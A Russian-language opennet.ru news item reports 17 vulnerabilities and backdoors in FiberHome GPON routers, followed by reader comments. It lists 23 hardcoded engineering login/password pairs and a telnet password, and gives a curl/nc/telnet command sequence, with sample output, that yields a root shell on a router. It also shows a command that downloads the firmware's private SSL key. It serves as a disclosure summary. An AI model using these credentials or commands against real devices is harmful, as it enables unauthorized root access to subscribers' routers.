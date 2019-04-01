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Бэкдор в маршрутизаторах FiberHome

18.01.2021 20:37

В маршрутизаторах FiberHome, применяемых провайдерами для подключения абонентов к оптическим линиям связи GPON, выявлено 17 проблем с безопасностью, среди которых наличие бэкдоров с предопределёнными учётными данными, позволяющими удалённо управлять оборудованием. Проблемы дают возможность удалённому атакующему получить root-доступ к устройству без прохождения аутентификации. Наличие уязвимостей подтверждено в устройствах FiberHome HG6245D и RP2602, а также частично в устройствах AN5506-04-*, но не исключено, что проблемы затрагивают и другие модели маршрутизаторов данной компании, которые не проверялись.

Отмечается, что по умолчанию доступ по IPv4 к интерфейсу администратора на изученных устройствах ограничен внутренним сетевым интерфейсом, допускающим обращение только из локальной сети, но при этом доступ по IPv6 никак не ограничен, что позволяет использовать присутствующие бэкдоры при обращении по IPv6 из внешней сети.

Кроме web-интерфейса, работающего через HTTP/HTTPS, на устройствах предусмотрена функция для удалённой активации интерфейса командной строки, к которому можно обращаться по протоколу telnet. CLI активируется отправкой специального запроса по протоколу HTTPS с предопределёнными учётными данными. Кроме того, в http-сервере, обслуживающем web-интерфейс, выявлена уязвимость (переполнение стека), эксплуатируемая через отправку запроса со специально оформленным значением HTTP Cookie.

Всего исследователем выявлено 17 проблем с безопасностью, из которых 7 затрагивают HTTP-сервер, 6 - сервер telnet, а остальные связаны с общесистемными брешами. Производитель был уведомлен о выявленных проблемах год назад, но информации об исправлении не поступило. Среди выявленных проблем:

  • Утечка информации о подсетях, прошивке, идентификаторе соединения FTTH , IP- и MAC-адресах на стадии до прохождения аутентификации.
  • Сохранение в логе паролей пользователей в открытом виде.
  • Хранение открытым текстом учётных данных для подключения к беспроводным сетям и паролей.
  • Переполнение стека в HTTP-сервере.
  • Присутствие в прошивке закрытого ключа для SSL-сертификатов, который можно загрузить по HTTPS ("curl https://host/privkeySrv.pem").
  • Бэкдор для активации telnet - в коде http-сервера присутствует специальный обработчик запросов "/telnet", а также обработчик "/fh" для привилегированного доступа.
  • Жёстко заданные в прошивке инженерные пароли и параметры аутентификации. Всего в коде http-сервера было выявлено 23 прошитых учётных записей, привязанных к разным провайдерам. Пароли использовались в обработчике https://ip/fh для активации telnet:
    • user / user1234
    • f~i!b@e#r$h%o^m*esuperadmin / s(f)u_h+g|u
    • admin / lnadmin
    • admin / CUadmin
    • admin / admin
    • telecomadmin / nE7jA%5m
    • adminpldt / z6dUABtl270qRxt7a2uGTiw
    • gestiontelebucaramanga / t3l3buc4r4m4ng42013
    • rootmet / m3tr0r00t
    • awnfibre / fibre@dm!n
    • trueadmin / admintrue
    • admin / G0R2U1P2ag
    • admin / 3UJUh2VemEfUtesEchEC2d2e
    • admin / c 6 по 32 символы MAC-адреса на интерфейсе br0
    • admin / 888888
    • L1vt1m4eng / 888888
    • useradmin / 888888
    • user / 888888
    • admin / 1234
    • user / tattoo@home
    • admin / tele1234
    • admin / aisadmin
  • Дополнительно в CLI-интерфейсе можно запустить на 26 сетевом порту отдельный процесс telnetd с правами root, передав последовательность команд "�,help,list,who,ddd,tshell" ('GgpoZWxwCmxpc3QKd2hvCg==' в base64). Для подключения к telnet определён общий пароль "GEPON".

В простейшем случае для получения root-доступа к маршрутизатору достаточно отправить несколько запросов при помощи утилиты curl: 


   # Получаем информацию о MAC-адресе, через API, доступный без аутентификации:

    curl -k https://target/info.asp 

   # Используем хвост MAC-адреса в качестве ключа для снятия в пакетном фильтре блокировки доступа к CLI-интерфейсу по протоколу telnet:

    сurl -k 'https://target/telnet?enable=1&key=ENDING_PART_MAC_ADDR'  

   # Отправляем в CLI-интерфейс на 23 порт последовательность команд для запуска процесса telnetd.
                                      
    echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d | nc target 23 >/dev/null &
                                                                                        
   # Подключаемся к сетевому порту 26 по протоколу telnet с логином root и паролем  GEPON.                                                                             

    telnet target 26
   
    (none) login: root
    Password: [GEPON]
    BusyBox v1.27.2 (2019-04-01 19:16:06 CST) built-in shell (ash)
    #id
    uid=0(root) gid=0 groups=0 # game over


  1. Главная ссылка к новости (https://seclists.org/fulldiscl...)
  2. OpenNews: Уязвимости в маршрутизаторах GPON, которые уже используются для создания ботнета
  3. OpenNews: В межсетевых экранах Juniper выявлен бэкдор с функциями расшифровки трафика VPN
  4. OpenNews: В Webmin найден бэкдор, позволяющий удалённо получить доступ с правами root
  5. OpenNews: Результаты анализа бэкдоров в приложениях для Android
  6. OpenNews: Бэкдор в межсетевых экранах и контроллерах точек доступа Zyxel
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/54428-fiberhome
Ключевые слова: fiberhome, gpon, backdoor
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (32) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, InuYasha (??), 20:33, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +3 +/
    Не вижу логинов mts, mgts, rtkom )
     
     
  • 2.2, Шарп (ok), 20:35, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Наши не шпионят. Только мерзкие ЦРУ и ФБР.
     
     
  • 3.9, Аноним (-), 21:09, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    > Наши не шпионят.

    учитывая, что при подключении оптики в дом часто рутер/мультиплексор даётся провом в аренду, то наверняка там есть всё, что нужно для типа "служебного" доступа.

     
     
  • 4.15, InuYasha (??), 21:32, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Уже проверено и известно. Потому и спрашивал с улыбкой.
     
     
  • 5.17, InuYasha (??), 21:35, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    Помнится, поверхностно было где-то здесь https://kiwibyrd.org/2018/02/24/5102/
     
     
  • 6.27, Аноним (27), 23:10, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Если пьёшь с ворами - опасайся за свой кошелёк
    > Если ходишь по грязной дороге - то не сможешь не выпачкать ног.

    И. Кормильцев, Тутанхамон.

    Патенты патентастов - не их. Вся сила патентов в предоставленной патентастам СУВЕРЕНОМ монополии. И монополию патентастам предоставляет суверен не потому, что ему так жалко бедных патентастов, а потому что суверену это выгодно. Суверен неподсуден - он сам и есть закон, и его слово закон. Судья есть лишь государев человек, его руки и глаза на местах, следящие за соблюдением воли суверена.

    Патентасты решили поиграть в феодальные игры и надеялись по их результатам записаться в дворяне, но внезапно выяснилось, что игры эти затевались не ради патентастов, а ради суверена, что дворянство суверен хочет даёт, а хочет - не даёт, что в бояре вообще не попасть человеку со стороны, и что каждый верноподданный в них и так обязан играть. Какая жалость, бедных патентастов обделили.

     
     
  • 7.29, InuYasha (??), 23:34, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Я очень извиняюсь - дал не ту ссылку. "ту" потерял, поиски продолжаются. (

    PS: да, во многом согласен.

     
  • 4.23, zzz (??), 22:25, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• –4 +/
    Ты себе-то не интересен, не то, что "службистам".
     
  • 2.3, Аноним (3), 20:35, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Они на Sercomm'овских роутерах зашиты)
     
  • 2.11, Аноним (11), 21:17, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Они юзают admin\admin
     
  • 2.13, commiethebeastie (ok), 21:28, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    admin/admin1 попробуй.
     

  • 1.4, Аноним (4), 20:45, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Мда...
     
  • 1.5, Аноним (5), 20:45, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d

    help
    list
    who
    ddd
    tshell

    странная "последовательность команд для запуска телнет"... Это точно не русские? Очень на них похоже.

     
     
  • 2.7, Андропов17 (?), 20:57, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    > Это точно не русские? Очень на них похоже.

    Нет товарищ, это сделано специально проклятыми империалистами и ястребами войны, чтобы подставить честных и открытых разведчиков, а "новички" вроде вас, слишком много болтают на радость шпиёнам, тем самым подрывая веру в светлое будущее "Чебурнета" тчк

     
  • 2.8, Русские (?), 21:09, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > странная "последовательность команд для запуска телнет"... Это точно не русские? Очень на них похоже.

    Точно. Мы обычно в бэкдоры вставляем одну команду из трёх букв

     
     
  • 3.35, Crazy Alex (ok), 01:10, 19/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Да вы её везде вставляете
     

  • 1.6, Онаним (?), 20:55, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Обычная китайская поляпка-поделка. Всё нормально.
     
  • 1.10, Сейд (ok), 21:13, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Как же защититься от этой дыры?
     
     
  • 2.31, Аноним (31), 00:35, 19/01/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    поставить перед ним ещё один другой маршрутизатор
     

  • 1.12, ryoken (ok), 21:18, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    OpenWRT на это добро бывает?
     
     
  • 2.24, zzz (??), 22:30, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    OPNsense
     
  • 2.25, Аноним (25), 23:06, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Сглазили https://www.opennet.ru/opennews/art.shtml?num=54430
     
     
  • 3.36, Crazy Alex (ok), 01:10, 19/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Форум - и пёс бы с ним
     

  • 1.14, commiethebeastie (ok), 21:29, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Даже не знаю какой из этих паролей лучше.
     
  • 1.18, Wilem82 (?), 21:45, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +6 +/
    Опеннет же любит переводить айтишные термины с английского на русские, почему тут - "бэкдор"? В сто раз лучше же звучит: "в маршрутизаторах FiberHome обнаружен задний проход".
     
     
  • 2.26, DildoZilla (?), 23:09, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Я только за, птичий язык изрядно поднадоел, но в английском backdoor имеет несколько значений, одно из которых таки да, приведёт к появлению новостей вида "В маршрутизаторах капиталистических империалистов <название_шараги> обнаружен анальный секс!".
     
  • 2.28, Аноним (27), 23:15, 18/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Название "задний проход" зарезервировано за https://en.wikipedia.org/wiki/Back_Orifice.
     
     
  • 3.34, InuYasha (??), 00:53, 19/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Название "задний проход" зарезервировано за https://en.wikipedia.org/wiki/Back_Orifice.

    "Заднее отверстие", тогда уж. А "задняя дверь" вполне себе распространённое и бытовое, и шпионское понятие.

     

  • 1.19, Огонь (?), 21:56, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Mikrotik таким не страдает
     
     
  • 2.32, Ivan_83 (ok), 00:52, 19/01/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Там другой набор зашитых бэкдоров :)
     

  • 1.30, Аноним (30), 23:34, 18/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Ростелеком? Что скажет специалист по России Боб Джонстон?
     
  • 1.33, Ivan_83 (ok), 00:52, 19/01/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Такое ощущение что сделано всё возможное чтобы можно было залогинится под админом используя любимый пароль :)
     

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